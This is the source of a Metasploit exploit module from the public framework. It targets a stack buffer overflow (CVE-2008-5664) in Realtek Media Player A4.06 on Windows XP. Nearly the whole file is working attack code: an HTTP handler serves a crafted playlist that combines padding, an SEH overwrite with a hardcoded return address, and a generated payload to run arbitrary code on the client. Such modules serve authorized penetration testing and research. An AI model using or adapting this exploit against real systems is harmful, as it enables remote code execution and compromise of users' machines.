modules/exploits/windows/misc/realtek_playlist.rb from rapid7/metasploit-framework

modules/exploits/windows/misc/realtek_playlist.rb
Summary

Maintainability

1 hr
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Realtek Media Player Playlist Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.
        When a Realtek Media Player client opens a specially crafted playlist, an
        attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2008-5664'],
          [ 'OSVDB', '50715'],
          [ 'BID', '32860' ],
        ],
      'Payload'        =>
        {
          'Space'           => 550,
          'BadChars'      => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Realtek Media Player(RtlRack) A4.06 (XP Pro All English)', { 'Ret' => 0x72d12899 } ], #  msacm32.drv 5.1.2600.0  (xpclient.010817-1148)
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-12-16',
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)

    return if ((p = regenerate_payload(cli)) == nil)

    pla =  rand_text_alpha_upper(200)
    pla << generate_seh_payload(target.ret)
    pla << rand_text_alpha_upper(1266)

    print_status("Sending exploit")

    send_response_html(cli, pla, { 'Content-Type' => 'text/plain' })

    handler(cli)

  end
end